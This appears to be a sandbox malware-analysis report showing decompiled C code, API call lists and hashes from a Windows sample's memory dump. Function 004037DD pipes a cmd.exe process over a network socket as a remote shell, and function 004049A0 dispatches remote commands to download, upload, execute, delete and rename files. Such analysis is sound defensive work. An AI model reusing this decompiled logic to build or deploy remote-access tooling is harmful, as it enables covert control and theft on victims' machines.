                                            0x0040db49
                                            0x00000000
                                            0x00000000
                                            0x0040d63b
                                            0x0040d1d4
                                            0x0040d603
                                            0x0040d60a
                                            0x0040d610
                                            0x0040d610
                                            0x00000000
                                            0x0040d60a
                                            0x0040d1da
                                            0x0040d1de
                                            0x00000000
                                            0x00000000
                                            0x0040d1e4
                                            0x00000000
                                            0x0040d1f7
                                            0x0040d211
                                            0x0040d22d
                                            0x0040d288
                                            0x0040d28c
                                            0x0040d29b
                                            0x0040d2a4
                                            0x0040d2b0
                                            0x0040d2bc
                                            0x0040d2c8
                                            0x0040d2d4
                                            0x0040d2e0
                                            0x0040d2ec
                                            0x0040d2f5
                                            0x0040d2fe
                                            0x0040d316
                                            0x0040d31e
                                            0x0040d34b
                                            0x0040d357
                                            0x0040d35c
                                            0x0040d35e
                                            0x00000000
                                            0x00000000
                                            0x0040d364
                                            0x0040d365
                                            0x00000000
                                            0x0040d320
                                            0x0040d322
                                            0x0040d32c
                                            0x0040d33c
                                            0x0040d32e
                                            0x0040d32f
                                            0x0040d32f
                                            0x00000000
                                            0x0040d32c
                                            0x00000000
                                            0x0040d371
                                            0x0040d373
                                            0x0040d367
                                            0x0040d367
                                            0x00000000
                                            0x00000000
                                            0x0040d5d9
                                            0x0040d5dd
                                            0x0040d5e2
                                            0x0040d5e5
                                            0x0040d5e7
                                            0x0040d5e9
                                            0x0040d5ee
                                            0x0040d5f0
                                            0x0040d5f5
                                            0x0040d5fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040d381
                                            0x0040d388
                                            0x0040d38d
                                            0x0040d390
                                            0x0040d394
                                            0x0040d396
                                            0x0040d3a4
                                            0x0040d3a6
                                            0x0040d3b0
                                            0x0040d3b2
                                            0x0040d3b4
                                            0x0040d3ba
                                            0x0040d3bc
                                            0x0040d3c1
                                            0x0040d3c6
                                            0x0040d3ca
                                            0x0040d3cf
                                            0x0040d3d3
                                            0x00000000
                                            0x00000000
                                            0x0040d3df
                                            0x0040d3e8
                                            0x0040d3ea
                                            0x0040d3f6
                                            0x0040d3f8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040d404
                                            0x0040d40d
                                            0x0040d40f
                                            0x0040d41c
                                            0x00000000
                                            0x00000000
                                            0x0040d427
                                            0x00000000
                                            0x00000000
                                            0x0040d44e
                                            0x00000000
                                            0x00000000
                                            0x0040d452
                                            0x0040d459
                                            0x0040d462
                                            0x0040d464
                                            0x0040d471
                                            0x0040d477
                                            0x0040d47b
                                            0x00000000
                                            0x00000000
                                            0x0040d48a
                                            0x0040d48c
                                            0x0040d498
                                            0x0040d49a
                                            0x0040d4a0
                                            0x0040d4a4
                                            0x0040d4aa
                                            0x0040d4af
                                            0x0040d4b9
                                            0x0040d4cc
                                            0x0040d4d2
                                            0x0040d4d6
                                            0x0040d4db
                                            0x00000000
                                            0x00000000
                                            0x0040d4e6
                                            0x0040d4ea
                                            0x0040d4f0
                                            0x0040d4f5
                                            0x0040d4fa
                                            0x0040d501
                                            0x00000000
                                            0x00000000
                                            0x0040d509
                                            0x0040d50d
                                            0x0040d512
                                            0x0040d515
                                            0x0040d51d
                                            0x00000000
                                            0x00000000
                                            0x0040d529
                                            0x0040d52b
                                            0x0040d537
                                            0x0040d545
                                            0x00000000
                                            0x00000000
                                            0x0040d552
                                            0x0040d556
                                            0x0040d55c
                                            0x0040d561
                                            0x0040d568
                                            0x0040d571
                                            0x0040d573
                                            0x0040d57f
                                            0x0040d581
                                            0x0040d589
                                            0x0040d592
                                            0x0040d594
                                            0x0040d59a
                                            0x0040d5a0
                                            0x0040d5a2
                                            0x0040d5a8
                                            0x0040d5a8
                                            0x0040d5a8
                                            0x0040d5b0
                                            0x0040d5b8
                                            0x0040d5c2
                                            0x00000000
                                            0x00000000
                                            0x0040d5cd
                                            0x0040d5ce
                                            0x0040d5d3
                                            0x0040d5d5
                                            0x0040d5d7
                                            0x0040d5d7
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CountEventTick
                                            • String ID: PowrProf.dll$SetSuspendState$\YE
                                            • API String ID: 180926312-1491534318
                                            • Opcode ID: bbabd4e423691622e90b60fb9ded92d303b32457d4ca091c836bb28f191b5216
                                            • Instruction ID: 119643b13c5ee609aee3f2dc391433e2dba6b00bb48ac57ec82eedd91ffb14ff
                                            • Opcode Fuzzy Hash: bbabd4e423691622e90b60fb9ded92d303b32457d4ca091c836bb28f191b5216
                                            • Instruction Fuzzy Hash: 3732B371A043016BD614FBB1DD5AAAF36699F95309F00093FF542BB1E2EE3C9D08C65A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004037DD, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 283pipesleepfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E004037DD(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x4628e0 >  *((intOrPtr*)(_t138 + 4))) {
					E00428B91(0x4628e0);
					_t160 =  *0x4628e0 - _t147;
					if( *0x4628e0 == _t147) {
						E0040153A(0, 0x462858, 0);
						E00428A31(_t160, E00448B7D);
						 *_t156 = 0x4628e0;
						E00428B52(_t147);
					}
				}
				if( *0x4628c0 >  *((intOrPtr*)(_t138 + 4))) {
					E00428B91(0x4628c0);
					_t162 =  *0x4628c0 - _t147;
					if( *0x4628c0 == _t147) {
						E004020CF(_t98, 0x4628e8);
						E00428A31(_t162, E00448B73);
						E00428B52(_t147, 0x4628c0);
					}
				}
				_t100 =  &_v40;
				E004020CF(_t98,  &_v40);
				_t139 = 0x4610e0;
				_v8 = _t98;
				_t163 =  *0x460a63 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x4628c8, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E0040207E(_t98, _t156, 0x4554cc);
						_push(0x62);
						_t98 = 0x8bffffdc;
						asm("lock movzx eax, byte [0x460a84]");
						goto L22;
					}
					_push(_v12);
					_t56 = E00430CDA(_t100);
					_t140 = _t56;
					ReadFile( *0x4628c8, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L00430AAB(_t140);
						_t139 = 0x4610e0;
						goto L22;
					}
					if(_v8 <= _t98) {
						L17:
						E0040207E(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E00403C07(_t98, _t107, _t136, _t172);
						_t147 = E00401790(_t98, 0x462858, _t136, _t172, 0x62,  &_v64);
						E00401F97();
						goto L19;
					}
					_t66 = E00430CF0(_t140, E00401F2E( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E0040207E(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00403C62("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L27:
						E00401AF7(0x462858);
						CloseHandle( *0x4628c8);
						CloseHandle( *0x4628e4);
						 *0x460a63 = _t98;
						_t98 = 1;
						L28:
						E00401F97();
						E00401F97();
						return _t98;
					}
					E00403BFE(_t98, 0x4628e8, E00430F6D(_t98, _t164, "SystemDrive"));
					E00403BF5(0x4628e8, "\\");
					0x462800->nLength = 0xc;
					 *0x462808 = 1;
					 *0x462804 = _t98;
					if(CreatePipe(0x4628dc, 0x4628c4, 0x462800, _t98) == 0 || CreatePipe(0x4628c8, 0x4628e4, 0x462800, _t98) == 0) {
						goto L28;
					} else {
						_t151 = 0x44;
						E0042B710(0x462810, 0x462810, _t98, CreatePipe);
						0x462810->cb = _t151;
						 *0x46283c = 0x101;
						 *0x462840 = 0;
						 *0x462848 =  *0x4628dc;
						_t79 =  *0x4628e4;
						 *0x46284c = _t79;
						 *0x462850 = _t79;
						_t80 = E00401F2E(0x4628e8);
						 *0x460a63 = CreateProcessA(_t98, E00401F2E(0x4610e0), _t98, _t98, 1, _t98, _t98, _t80, 0x462810, 0x4628cc) != 0;
						E00403BFE(_t98, 0x4610e0, 0x4554cc);
						 *0x460a84 = 1;
						E00401677(0x462858);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E004016F4("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020E6(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E00401F2E(0x4610e0), _t98, _t98, 1, _t98, _t98, _t80, 0x462810, 0x4628cc),  &_a4);
						_push(0x93);
						_t100 = 0x462858;
						_t147 = E00401790(_t98, 0x462858, "cmd.exe", CreateProcessA(_t98, E00401F2E(0x4610e0), _t98, _t98, 1, _t98, _t98, _t80, 0x462810, 0x4628cc));
						Sleep(0x12c);
						_t168 =  *0x460a63 - _t98; // 0x0
						if(_t168 == 0) {
							goto L27;
						}
						_t139 = 0x4610e0;
						do {
							goto L12;
							L22:
							_t38 =  <=  ? 0 :  *0x460a84 & 0x000000ff;
							_t100 = _t139;
							 *0x460a84 =  <=  ? 0 :  *0x460a84 & 0x000000ff;
							if(E00401F26() == 0) {
								_v8 = _t98;
							} else {
								E00403BF5(_t139, "\n");
								E00401F7D( &_v40, _t139);
								_t52 = E00401F26();
								WriteFile( *0x4628c4, E00401F2E(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E00403BFE(_t98, _t139, 0x4554cc);
							}
							Sleep(0x64);
							_t175 =  *0x460a84 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x4628cc->hProcess, _t98);
						CloseHandle( *0x4628d0);
						CloseHandle( *0x4628cc);
						goto L27;
					}
				}
			}





























                                            0x004037e6
                                            0x004037ea
                                            0x004037ec
                                            0x004037ee
                                            0x004037f6
                                            0x004037fe
                                            0x00403805
                                            0x0040380b
                                            0x00403811
                                            0x00403819
                                            0x00403823
                                            0x00403828
                                            0x0040382f
                                            0x00403834
                                            0x00403811
                                            0x00403840
                                            0x00403848
                                            0x0040384e
                                            0x00403854
                                            0x0040385b
                                            0x00403865
                                            0x0040386c
                                            0x00403871
                                            0x00403854
                                            0x00403872
                                            0x00403875
                                            0x0040387a
                                            0x0040387f
                                            0x00403882
                                            0x00403888
                                            0x004039fe
                                            0x00403a02
                                            0x00403a0f
                                            0x00403a18
                                            0x00403aba
                                            0x00403ac4
                                            0x00403ac9
                                            0x00403ad1
                                            0x00403ad6
                                            0x00000000
                                            0x00403ad6
                                            0x00403a1e
                                            0x00403a21
                                            0x00403a28
                                            0x00403a38
                                            0x00403a41
                                            0x00403aac
                                            0x00403aad
                                            0x00403ab3
                                            0x00000000
                                            0x00403ab3
                                            0x00403a46
                                            0x00403a7b
                                            0x00403a7f
                                            0x00403a84
                                            0x00403a87
                                            0x00403a89
                                            0x00403a8c
                                            0x00403a8d
                                            0x00403a91
                                            0x00403aa5
                                            0x00403aa7
                                            0x00000000
                                            0x00403aa7
                                            0x00403a55
                                            0x00403a5a
                                            0x00403a5d
                                            0x00403a5f
                                            0x00000000
                                            0x00000000
                                            0x00403a65
                                            0x00403a70
                                            0x00403a73
                                            0x00403a75
                                            0x00403a76
                                            0x00000000
                                            0x0040388e
                                            0x0040388e
                                            0x00403895
                                            0x0040389a
                                            0x0040389c
                                            0x00403b75
                                            0x00403b7a
                                            0x00403b85
                                            0x00403b91
                                            0x00403b97
                                            0x00403b9d
                                            0x00403b9f
                                            0x00403ba2
                                            0x00403baa
                                            0x00403bb7
                                            0x00403bb7
                                            0x004038b5
                                            0x004038c1
                                            0x004038dd
                                            0x004038e7
                                            0x004038f1
                                            0x004038fb
                                            0x00000000
                                            0x00403917
                                            0x00403919
                                            0x00403922
                                            0x0040392a
                                            0x00403932
                                            0x0040393c
                                            0x00403951
                                            0x00403956
                                            0x0040395c
                                            0x00403961
                                            0x00403966
                                            0x0040398f
                                            0x00403996
                                            0x004039a0
                                            0x004039a7
                                            0x004039b6
                                            0x004039b7
                                            0x004039b8
                                            0x004039b9
                                            0x004039c1
                                            0x004039c6
                                            0x004039cf
                                            0x004039d4
                                            0x004039d9
                                            0x004039e5
                                            0x004039e7
                                            0x004039ed
                                            0x004039f3
                                            0x00000000
                                            0x00000000
                                            0x004039f9
                                            0x004039fe
                                            0x00000000
                                            0x00403ad7
                                            0x00403ae2
                                            0x00403ae5
                                            0x00403ae7
                                            0x00403af3
                                            0x00403b39
                                            0x00403af5
                                            0x00403afc
                                            0x00403b05
                                            0x00403b11
                                            0x00403b25
                                            0x00403b30
                                            0x00403b32
                                            0x00403b32
                                            0x00403b3e
                                            0x00403b44
                                            0x00403b44
                                            0x00403b57
                                            0x00403b63
                                            0x00403b6f
                                            0x00000000
                                            0x00403b6f
                                            0x004038fb

                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 0040382F
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            • __Init_thread_footer.LIBCMT ref: 0040386C
                                            • CreatePipe.KERNEL32(004628DC,004628C4,00462800,00000000,004554E4,00000000), ref: 004038F7
                                            • CreatePipe.KERNEL32(004628C8,004628E4,00462800,00000000), ref: 0040390D
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00462810,004628CC), ref: 00403980
                                            • Sleep.KERNEL32(0000012C), ref: 004039E7
                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403A0F
                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00403A38
                                              • Part of subcall function 00428A31: __onexit.LIBCMT ref: 00428A37
                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,004610E0,004554E8), ref: 00403B25
                                            • Sleep.KERNEL32(00000064), ref: 00403B3E
                                            • TerminateProcess.KERNEL32(00000000), ref: 00403B57
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B63
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B6F
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B85
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                            • String ID: SystemDrive$X(F$X(F$X(F$X(F$X(F$X(F$cmd.exe$hF$(F$(F$(F
                                            • API String ID: 2994406822-2989967796
                                            • Opcode ID: 64b4b1eb8db0865aae59cc78df6025b6d80c06131bd82f3d78db6b14bf45e5a5
                                            • Instruction ID: 856d0b44c89f3ff902f183caeee8d9d2613a832670c398e2290cd68fb1934b07
                                            • Opcode Fuzzy Hash: 64b4b1eb8db0865aae59cc78df6025b6d80c06131bd82f3d78db6b14bf45e5a5
                                            • Instruction Fuzzy Hash: A391F371A00600BBC710BFA59E4696E3BA9EB41345B10427FF441B72E2EFF85D409B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004049A0, Relevance: 41.0, APIs: 7, Strings: 16, Instructions: 714COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E004049A0(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v188;
				char _v192;
				void* _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v324;
				char _v336;
				char _v344;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t163;
				signed int _t165;
				void* _t169;
				signed int _t175;
				void* _t190;
				void* _t205;
				signed int _t207;
				int _t231;
				void* _t238;
				void* _t239;
				void* _t252;
				void* _t259;
				signed int _t264;
				void* _t278;
				void* _t297;
				void* _t309;
				void* _t341;
				void* _t343;
				void* _t345;
				void* _t349;
				void* _t353;
				void* _t363;
				void* _t365;
				void* _t386;
				void* _t389;
				void* _t556;
				void* _t599;
				intOrPtr _t604;
				intOrPtr _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				void* _t617;
				void* _t619;
				void* _t621;
				void* _t622;
				void* _t624;
				signed int _t625;
				void* _t628;
				void* _t629;
				void* _t630;
				void* _t631;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t637;
				void* _t642;
				void* _t643;
				void* _t644;
				void* _t646;
				void* _t648;
				void* _t670;
				void* _t671;
				void* _t672;
				void* _t673;
				void* _t676;
				void* _t678;

				_t677 = __eflags;
				_t564 = __edx;
				_push(_t365);
				_t604 = _a4;
				_push(_t599);
				E004020E6(_t365,  &_v156, __edx, __eflags, _t604 + 0x1c);
				SetEvent( *(_t604 + 0x34));
				_t605 =  *((intOrPtr*)(E00401F2E( &_v160)));
				E00401F0C( &_v160,  &_v136, 4, 0xffffffff);
				_t628 = (_t625 & 0xfffffff8) - 0xec;
				E004020E6(0x46103c, _t628, _t564, _t677, 0x46103c);
				_t629 = _t628 - 0x18;
				E004020E6(0x46103c, _t629, _t564, _t677,  &_v152);
				E00411260( &_v288, _t564);
				_t630 = _t629 + 0x30;
				_t678 = _t605 - 0x8b;
				if(_t678 > 0) {
					_t606 = _t605 - 0x8c;
					__eflags = _t606;
					if(__eflags == 0) {
						E004031DB(0x46103c,  &_v256, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
						_t163 = GetFileAttributesW(L00404090( &_v260));
						__eflags = _t163 & 0x00000010;
						if((_t163 & 0x00000010) == 0) {
							_t165 = DeleteFileW(L00404090( &_v260));
						} else {
							_t165 = E0041146E(L00404090( &_v260));
						}
						__eflags = _t165;
						__eflags = _t165 & 0xffffff00 | _t165 != 0x00000000;
						if(__eflags == 0) {
							_t631 = _t630 - 0x18;
							E004111F2(0x46103c, _t631,  &_v252);
							_push(0x55);
							E00401790(0x46103c, 0x4610f8,  &_v252, __eflags);
							_t169 = E00411191( &_v232,  &_v280);
							_t632 = _t631 - 0x18;
							_t567 = "Unable to delete: ";
							E004059B8(0x46103c, _t632, "Unable to delete: ", _t599, __eflags, _t169);
							_t633 = _t632 - 0x14;
							_t386 = _t633;
							_push("[ERROR]");
						} else {
							_t190 = E00411191( &_v204,  &_v252);
							_t637 = _t630 - 0x18;
							_t567 = "Deleted file: ";
							E004059B8(0x46103c, _t637, "Deleted file: ", _t599, __eflags, _t190);
							_t633 = _t637 - 0x14;
							_t386 = _t633;
							_push("[Info]");
						}
						E0040207E(0x46103c, _t386);
						E00410B51(0x46103c);
						_t634 = _t633 + 0x30;
						E00401F97();
						_t389 = E004031A1( &_v288, _t567, __eflags, 1);
						_t175 = E00403C62("1");
						__eflags = _t175;
						if(_t175 == 0) {
							L40:
							E004031D1();
							L41:
							E004031CC( &_v284);
							E00401F97();
							E00401F97();
							return 0;
						} else {
							__eflags = E00405390( &_v272, _t389, _t389) + 1;
							E004053AC(E00405390( &_v272, _t389, _t389) + 1);
							_push( &_v280);
							E004053CE( &_v284,  &_v284, _t606, E00405A1F(0x46103c,  &_v236,  &_v284));
							E004031D1();
							E004031DB(0x46103c, _t634 - 0x18, L00404090( &_v288));
							L39:
							E004041E6();
							goto L40;
						}
					}
					_t608 = _t606 - 1;
					__eflags = _t608;
					if(__eflags == 0) {
						E004031DB(0x46103c,  &_v256, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
						E004031DB(0x46103c,  &_v192, E00401F2E(E004031A1( &_v272, _t564, __eflags, 1)));
						E00405378( &_v276,  &_v252,  &_v268, E00405390( &_v268,  &_v192,  &_v192) + 1);
						_t205 = L00404090(E00405A50( &_v240,  &_v264,  &_v216));
						_t207 = E00431CC5(L00404090( &_v288), _t205);
						asm("sbb bl, bl");
						E004031D1();
						_t370 =  ~_t207 + 1;
						__eflags =  ~_t207 + 1;
						if(__eflags == 0) {
							E00402973(_t370, _t630 - 0x18, E004059DC( &_v204, "Unable to rename file!", __eflags, 0x46103c), __eflags, "16");
							_push(0x59);
							E00401790(_t370, 0x4610f8, _t209, __eflags);
							E00401F97();
						} else {
							E0040590A(_t630 - 0x18,  &_v228, __eflags, "*");
							E004041E6();
						}
						E004031D1();
						L13:
						E004031D1();
						goto L40;
					}
					_t610 = _t608 - 1;
					__eflags = _t610;
					if(__eflags == 0) {
						E004031DB(0x46103c,  &_v256, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
						CreateDirectoryW(L00404090(E0040590A( &_v216,  &_v264, __eflags, E00401F2E(E004031A1( &_v272, _t564, __eflags, 1)))), 0);
						E004031D1();
						E004053BD(0x2a);
						E00405481(0x46103c, _t630 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t612 = _t610 - 3;
					__eflags = _t610 - 3;
					if(__eflags == 0) {
						_t231 = StrToIntA(E00401F2E(E004031A1( &_v264, _t564, __eflags, _t612)));
						E00411A6A(_t231, E00401F2E(E004031A1( &_v268, _t564, __eflags, 1)));
					}
					goto L41;
				}
				if(_t678 == 0) {
					E004020CF(0x46103c,  &_v252);
					E0040153A(0x46103c,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004016F4(_t564);
					_t238 = E004031A1( &_v284, _t564, __eflags, 3);
					_t642 = _t630 - 0xfffffffffffffff8;
					_push(_t238);
					_t239 = E004031A1( &_v288, _t564, __eflags, 2);
					E00404095(0x46103c, _t642, E00404095(0x46103c,  &_v212, E00404095(0x46103c,  &_v260, E004040B9( &_v236, E004031A1( &_v292, _t564, __eflags, 1)), __eflags,  &_v288), __eflags, _t239), __eflags, 0x46103c);
					E00401790(0x46103c,  &_v140, _t243, __eflags);
					E00401F97();
					E00401F97();
					E00401F97();
					E004031DB(0x46103c,  &_v292, E00401F2E(E004031A1( &_v324, _t243, __eflags, 0)));
					_t252 = E00411191( &_v272,  &_v296);
					_t643 = _t642 - 0x18;
					E004059B8(0x46103c, _t643, "Downloading file: ", _t630 - 0x10, __eflags, _t252);
					_t644 = _t643 - 0x14;
					E0040207E(0x46103c, _t644, "[Info]");
					E00410B51(0x46103c);
					E00401F97();
					E004031D1();
					_t259 = E00401F2E(E004031A1( &_v336, "Downloading file: ", __eflags, 0));
					_t646 = _t644 + 0x30 - 0x18;
					E004031DB(0x46103c, _t646, _t259);
					_t264 = E004042FB( &_v192, __eflags, E00431C6D(_t261, E00401F2E(E004031A1( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t648 = _t646 + 0x2c;
					__eflags = _t264;
					if(__eflags == 0) {
						E004031DB(0x46103c,  &_v264, E00401F2E(E004031A1( &_v296, "Downloading file: ", __eflags, 0)));
						E004059B8(0x46103c, _t648 - 0x18, "Failed to download file: ", "[Info]", __eflags, E00411191( &_v244,  &_v268));
						E0040207E(0x46103c, _t648 - 4, "[ERROR]");
						E00410B51(0x46103c);
						E00401F97();
						E004031D1();
					} else {
						_t278 = E0041107C(0x46103c,  &_v236, E00401F26());
						_t652 = _t648 - 0x18;
						E004059B8(0x46103c, _t648 - 0x18, "Downloaded file size: ", "[Info]", __eflags, _t278);
						E0040207E(0x46103c, _t652 - 0x14, "[DEBUG]");
						E00410B51(0x46103c);
						E00401F97();
						E004031DB(0x46103c,  &_v268, E00401F2E(E004031A1( &_v300, "Downloaded file size: ", __eflags, 0)));
						E004059B8(0x46103c, _t652 - 0x14 + 0x30 - 0x18, "Downloaded file: ", "[Info]", __eflags, E00411191( &_v248,  &_v272));
						E0040207E(0x46103c, _t652 - 0x14 + 0x30 - 4, "[Info]");
						E00410B51(0x46103c);
						E00401F97();
						E004031D1();
						E0040207E(0x46103c, _t652 - 0x14 + 0x30 - 4 + 0x30 - 0x18, 0x4554cc);
						_push(0x58);
						E00401790(0x46103c,  &_v160, "Downloaded file: ", __eflags);
					}
					E00401AF7( &_v140);
					E00401B1B(0x46103c,  &_v140, 0);
					L15:
					E00401F97();
					goto L41;
				}
				_t617 = _t605 - 0x61;
				if(_t617 == 0) {
					E004031DB(0x46103c, _t630 - 0x18, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
					_t297 = E004031A1( &_v272, _t564, __eflags, 2);
					E004108E5(E004031A1( &_v276, _t564, __eflags, 1), _t297);
					goto L41;
				}
				_t619 = _t617 - 0x26;
				if(_t619 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E004020A5(0x46103c,  &_v252, _t564, __eflags,  &_v108, 0x64);
					__eflags = E004054C8( &_v260, 0x45556c, 0, 2) + 1;
					E00405557(E004054C8( &_v260, 0x45556c, 0, 2) + 1);
					E004020E6(0x46103c, _t630 - 0x18, _t564, E004054C8( &_v260, 0x45556c, 0, 2) + 1,  &_v276);
					_t309 = E00404429(0x46103c,  &_v256);
					E00405870(_t630 - 0x18, E004040B9( &_v208,  &_v280),  &_v256);
					E00401790(0x46103c, 0x4610f8, _t310, __eflags, 0x51, _t309);
					E00401F97();
					E00401F97();
					goto L15;
				}
				_t621 = _t619 - 1;
				if(_t621 == 0) {
					E004031DB(0x46103c,  &_v256, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
					E00405481(0x46103c, _t630 - 0x18, _t564, __eflags,  &_v260);
					E004041E6();
					__eflags = E00401F26() - 2;
					E004059B8(0x46103c, _t630 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t599, E00401F26() - 2, E00411191( &_v204, E00405378( &_v264,  &_v240,  &_v264, E00401F26() - 2)));
					E0040207E(0x46103c, _t630 - 0x18 + 0x18 - 4, "[Info]");
					E00410B51(0x46103c);
					E00401F97();
					goto L13;
				}
				_t622 = _t621 - 1;
				if(_t622 == 0) {
					E004031DB(0x46103c,  &_v256, E00401F2E(E004031A1( &_v264, _t564, __eflags, 0)));
					ShellExecuteW(0, L"open", L00404090( &_v260), 0, 0, 1);
					E004059B8(0x46103c, _t630 - 0x18, "Executing file: ", _t599, __eflags, E00411191( &_v188,  &_v260));
					E0040207E(0x46103c, _t630 - 4, "[Info]");
					E00410B51(0x46103c);
					E00401F97();
					goto L40;
				} else {
					_t624 = _t622 - 1;
					_t683 = _t624;
					if(_t624 == 0) {
						E00405365( &_v108);
						_t341 = E004031A1( &_v264, _t564, _t683, 3);
						_t670 = _t630 - 0x18;
						E004020E6(0x46103c, _t670, _t564, _t683, _t341);
						_t343 = E004031A1( &_v272, _t564, _t683, 2);
						_t671 = _t670 - 0x18;
						E004020E6(0x46103c, _t671, _t564, _t683, _t343);
						_t345 = E004031A1( &_v280, _t564, _t683, 1);
						_t672 = _t671 - 0x18;
						E004020E6(0x46103c, _t672, _t564, _t683, _t345);
						_push(E00401F2E(E004031A1( &_v288, _t564, _t683, _t624)));
						_t349 = E004044C5( &_v136, _t564);
						_push(_t624);
						_t684 = _t349;
						if(_t349 == 0) {
							E004031DB(0x46103c,  &_v252, E00401F2E(E004031A1( &_v368, _t564, __eflags)));
							_t353 = E00411191( &_v208,  &_v256);
							_t673 = _t672 - 0x18;
							E004059B8(0x46103c, _t673, "Failed to upload file: ", _t599, __eflags, _t353);
							_t556 = _t673 - 0x14;
							_push("[ERROR]");
						} else {
							E004031DB(0x46103c,  &_v252, E00401F2E(E004031A1( &_v368, _t564, _t684)));
							_t363 = E00411191( &_v208,  &_v256);
							_t676 = _t672 - 0x18;
							E004059B8(0x46103c, _t676, "Uploaded file: ", _t599, _t684, _t363);
							_t556 = _t676 - 0x14;
							_push("[Info]");
						}
						E0040207E(0x46103c, _t556);
						E00410B51(0x46103c);
						E00401F97();
						E004031D1();
						L00405373(0x46103c,  &_v132, _t624);
					}
					goto L41;
				}
			}







































































































                                            0x004049a0
                                            0x004049a0
                                            0x004049b0
                                            0x004049b2
                                            0x004049b5
                                            0x004049ba
                                            0x004049c2
                                            0x004049dc
                                            0x004049e6
